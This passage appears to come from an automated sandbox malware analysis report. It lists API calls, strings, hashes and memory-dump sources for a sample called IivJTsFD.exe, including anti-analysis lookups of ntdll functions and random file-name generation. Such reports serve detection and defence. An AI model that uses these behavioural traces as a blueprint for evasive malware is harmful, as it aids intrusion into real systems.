                              • Opcode Fuzzy Hash: e29d1019d75a3ef2b9aaa5361f13083ea9f3bd8b989445bfb0f3acbc3aab1389
                              • Instruction Fuzzy Hash: 371137769112287BD720D7A5AC8DEEB7B6CDF5A792F000051F959E3040DA709F988BB4
                              APIs
                              • GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,00251400), ref: 00251226
                              • GetProcAddress.KERNEL32(00000000), ref: 0025122D
                              • GetCurrentProcessId.KERNEL32(?,?,?,?,00251400), ref: 0025123F
                              • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,00251400), ref: 00251250
                              • VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user\AppData\Local\Temp\IivJTsFD.exe,?,?,?,?,00251400), ref: 0025129E
                              • VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user\AppData\Local\Temp\IivJTsFD.exe,?,?,?,?,00251400), ref: 002512B0
                              • CloseHandle.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IivJTsFD.exe,?,?,?,?,00251400), ref: 002512F5
                              • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,00251400), ref: 0025130A
                              Strings
                              • C:\Users\user\AppData\Local\Temp\IivJTsFD.exe, xrefs: 00251262
                              • ntdll.dll, xrefs: 00251219
                              • ZwQuerySystemInformation, xrefs: 00251212
                              Memory Dump Source
                              • Source File: 00000001.00000002.1948111174.0000000000251000.00000020.00000001.01000000.00000004.sdmp, Offset: 00250000, based on PE: true
                              • Associated: 00000001.00000002.1948096690.0000000000250000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948123864.0000000000253000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948192701.0000000000254000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948206827.0000000000256000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_250000_IivJTsFD.jbxd
                              Similarity
                              • API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
                              • String ID: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe$ZwQuerySystemInformation$ntdll.dll
                              • API String ID: 1500695312-3064767164
                              • Opcode ID: 6510726b1097aa9f726cc1e00b4a0f1dd570652549718dd35b1a5ae07c77643c
                              • Instruction ID: 742322b9ae38b8885aafe575118003d5cb192546b3940e8f175621daa3a2588c
                              • Opcode Fuzzy Hash: 6510726b1097aa9f726cc1e00b4a0f1dd570652549718dd35b1a5ae07c77643c
                              • Instruction Fuzzy Hash: D3210631615322BBD720DF65DC08B6BBAA8FB85B42F000918FD45D6280C770DA68C7AD
                              APIs
                              • memset.MSVCRT ref: 002518B1
                              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,74DF0F00,75BF8400), ref: 002518D3
                              • CloseHandle.KERNEL32(I%%), ref: 002518E9
                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 002518F0
                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00251901
                              • CloseHandle.KERNEL32(?), ref: 0025190A
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1948111174.0000000000251000.00000020.00000001.01000000.00000004.sdmp, Offset: 00250000, based on PE: true
                              • Associated: 00000001.00000002.1948096690.0000000000250000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948123864.0000000000253000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948192701.0000000000254000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948206827.0000000000256000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_250000_IivJTsFD.jbxd
                              Similarity
                              • API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
                              • String ID: I%%
                              • API String ID: 876959470-603810813
                              • Opcode ID: b38f0013d821a52886cbc42aecc39f4513ff5128f7aaa3325e86f710fb0bc117
                              • Instruction ID: 5712b804b07b863d0c1d69db3c82cb6c6ba03b38f2ad115cf60bfbc3844fe635
                              • Opcode Fuzzy Hash: b38f0013d821a52886cbc42aecc39f4513ff5128f7aaa3325e86f710fb0bc117
                              • Instruction Fuzzy Hash: AC017176901228BBCB21AB95EC4CDDFBF7DEF85772F104021F915A51A0D6314A28CAA4
                              APIs
                              • CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,74DEE800,?,?,002529DB,?,00000001), ref: 002526A7
                              • WaitForSingleObject.KERNEL32(00000000,000000FF,74DEE800,?,?,002529DB,?,00000001), ref: 002526B5
                              • lstrlen.KERNEL32(?), ref: 002526C4
                              • ??2@YAPAXI@Z.MSVCRT(-00000005), ref: 002526CE
                              • lstrcpy.KERNEL32(00000004,?), ref: 002526E3
                              • lstrcpy.KERNEL32(?,00000004), ref: 0025271F
                              • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0025272D
                              • SetEvent.KERNEL32 ref: 0025273C
                              Memory Dump Source
                              • Source File: 00000001.00000002.1948111174.0000000000251000.00000020.00000001.01000000.00000004.sdmp, Offset: 00250000, based on PE: true
                              • Associated: 00000001.00000002.1948096690.0000000000250000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948123864.0000000000253000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948192701.0000000000254000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948206827.0000000000256000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_250000_IivJTsFD.jbxd
                              Similarity
                              • API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
                              • String ID:
                              • API String ID: 41106472-0
                              • Opcode ID: ffa3b2ecfef6e6df90627b0184635842f9fa9cd210a75857922743975f90a95d
                              • Instruction ID: 67fdbf88752735fd52440f45e27f44fe613d3f7c4e73f918b6f93ca0b3330aa7
                              • Opcode Fuzzy Hash: ffa3b2ecfef6e6df90627b0184635842f9fa9cd210a75857922743975f90a95d
                              • Instruction Fuzzy Hash: 16116736521300EFCB22EF15FD4C86ABBA9FB9A7677104016F858871A0D6708999DB5C
                              APIs
                              • srand.MSVCRT ref: 00251BCD
                              • rand.MSVCRT ref: 00251BD8
                              • memset.MSVCRT ref: 00251C43
                              • memcpy.MSVCRT(?,BuFKYWbeQhtyEgrQHTWstXlENxJVnXUIrPBkMvXLRSaiYcAqGTCjQPwCibNOemmvwNojlMaloqBDHTmxchZnODrKhEZLfZfqpGpLtJSvusygzyDWFwIcaMzSoIJnfCKHAAuGVpPRkRxOFbdUdszidYUVejgk,00000006,?,00000000,00000040,?,00000000,00000000,?,00000000,00000002), ref: 00251C4F
                              • lstrcat.KERNEL32(?,.exe), ref: 00251C5D
                              Strings
                              • .exe, xrefs: 00251C57
                              • BuFKYWbeQhtyEgrQHTWstXlENxJVnXUIrPBkMvXLRSaiYcAqGTCjQPwCibNOemmvwNojlMaloqBDHTmxchZnODrKhEZLfZfqpGpLtJSvusygzyDWFwIcaMzSoIJnfCKHAAuGVpPRkRxOFbdUdszidYUVejgk, xrefs: 00251B8A, 00251B9C, 00251C15, 00251C49
                              Memory Dump Source
                              • Source File: 00000001.00000002.1948111174.0000000000251000.00000020.00000001.01000000.00000004.sdmp, Offset: 00250000, based on PE: true
                              • Associated: 00000001.00000002.1948096690.0000000000250000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948123864.0000000000253000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948192701.0000000000254000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948206827.0000000000256000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_250000_IivJTsFD.jbxd
                              Similarity
                              • API ID: lstrcatmemcpymemsetrandsrand
                              • String ID: .exe$BuFKYWbeQhtyEgrQHTWstXlENxJVnXUIrPBkMvXLRSaiYcAqGTCjQPwCibNOemmvwNojlMaloqBDHTmxchZnODrKhEZLfZfqpGpLtJSvusygzyDWFwIcaMzSoIJnfCKHAAuGVpPRkRxOFbdUdszidYUVejgk
                              • API String ID: 122620767-1514442079
                              • Opcode ID: 5ee85a96b539ce00bdadf91d87fd223dd734c56d6a84423e5de0e42157103023
                              • Instruction ID: af9348f1c23a049ef18cf3e170a34d15923f68631906c8107eb3e7a363943b2d
                              • Opcode Fuzzy Hash: 5ee85a96b539ce00bdadf91d87fd223dd734c56d6a84423e5de0e42157103023
                              • Instruction Fuzzy Hash: 4A219B32E253906ED22623367C44B697B148FA372BF16009BFC810B1D2D17409FDC26D
                              APIs
                              • GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 00251334
                              • GetProcAddress.KERNEL32(00000000), ref: 0025133B
                              • memset.MSVCRT ref: 00251359
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1948111174.0000000000251000.00000020.00000001.01000000.00000004.sdmp, Offset: 00250000, based on PE: true
                              • Associated: 00000001.00000002.1948096690.0000000000250000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948123864.0000000000253000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948192701.0000000000254000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948206827.0000000000256000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_250000_IivJTsFD.jbxd
                              Similarity
                              • API ID: AddressHandleModuleProcmemset
                              • String ID: NtSystemDebugControl$ntdll.dll
                              • API String ID: 3137504439-2438149413
                              • Opcode ID: 4fd56bc0164305816fc70fa7e750ad2e08331b9e19a7b1e7474f437c2b453c9b
                              • Instruction ID: 7b7337ea19fec97c27b878c5cdbd23a57e5ace63073eb45ea395a4a332d6f22c
                              • Opcode Fuzzy Hash: 4fd56bc0164305816fc70fa7e750ad2e08331b9e19a7b1e7474f437c2b453c9b
                              • Instruction Fuzzy Hash: 7A01847161030EBFDB10DFA4EC89A6FBB68FB41316F00456AFD01A1190D3708679CA59
                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.1948111174.0000000000251000.00000020.00000001.01000000.00000004.sdmp, Offset: 00250000, based on PE: true
                              • Associated: 00000001.00000002.1948096690.0000000000250000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948123864.0000000000253000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948192701.0000000000254000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948206827.0000000000256000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_250000_IivJTsFD.jbxd
                              Similarity
                              • API ID: strrchr$lstrcmpilstrcpylstrlen
                              • String ID:
                              • API String ID: 3636361484-0
                              • Opcode ID: d6d72bbbab2f1e2eaef6a398b6bfa19aa0ad0be8318c7357c11a44d1030f0b4c
                              • Instruction ID: 95cc84e17711200788e9b28912565e2262b63514bc4eea77048bf7d1298fa076
                              • Opcode Fuzzy Hash: d6d72bbbab2f1e2eaef6a398b6bfa19aa0ad0be8318c7357c11a44d1030f0b4c
                              • Instruction Fuzzy Hash: FE01DB729143166FDB119B60FC4DBD7779CDB04356F040065DD45D30D1D6B49A988B98
                              APIs
                              • GetSystemTimeAsFileTime.KERNEL32(00251F92,00000000,?,00000000,?,?,?,00251F92,?,00000000,00000002), ref: 00251867
                              • srand.MSVCRT ref: 00251878
                              • rand.MSVCRT ref: 00251880
                              • srand.MSVCRT ref: 00251890
                              • rand.MSVCRT ref: 00251894
                              Memory Dump Source
                              • Source File: 00000001.00000002.1948111174.0000000000251000.00000020.00000001.01000000.00000004.sdmp, Offset: 00250000, based on PE: true
                              • Associated: 00000001.00000002.1948096690.0000000000250000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948123864.0000000000253000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948192701.0000000000254000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948206827.0000000000256000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_250000_IivJTsFD.jbxd
                              Similarity
                              • API ID: Timerandsrand$FileSystem
                              • String ID:
                              • API String ID: 4106363736-0
                              • Opcode ID: 3c7051733bee7004e8f8c7961da32a77d6c731762231f1efa5a07b69fbb9ae53
                              • Instruction ID: faa0ad3c6281b79c0a460cf67d2e76c37f8694e612f2c4cc46d0d210545f4ca9
                              • Opcode Fuzzy Hash: 3c7051733bee7004e8f8c7961da32a77d6c731762231f1efa5a07b69fbb9ae53
                              • Instruction Fuzzy Hash: 0EE01277A10318BBD700A7A9FC4A99EBBACDE841B2B110566F600D3294E574E9448AB8
                              APIs
                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0025603C
                              • GetProcAddress.KERNEL32(00000000,00256064), ref: 0025604F
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1948206827.0000000000256000.00000040.00000001.01000000.00000004.sdmp, Offset: 00250000, based on PE: true
                              • Associated: 00000001.00000002.1948096690.0000000000250000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948111174.0000000000251000.00000020.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948123864.0000000000253000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948192701.0000000000254000.00000004.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_250000_IivJTsFD.jbxd
                              Similarity
                              • API ID: AddressHandleModuleProc
                              • String ID: kernel32.dll
                              • API String ID: 1646373207-1793498882
                              • Opcode ID: 31987c20f7e8a8615187873746e88437352565774cb2d902dc657eb413b7ea0a
                              • Instruction ID: 13ad865660f176a50a05d82ac499ffb45d4511a9902f14cb43714a45c3058e01
                              • Opcode Fuzzy Hash: 31987c20f7e8a8615187873746e88437352565774cb2d902dc657eb413b7ea0a
                              • Instruction Fuzzy Hash: 41F0F6B114028A8FDF708E64CC48BEE37E4EB15711F90052AED09CB681DB3486198B18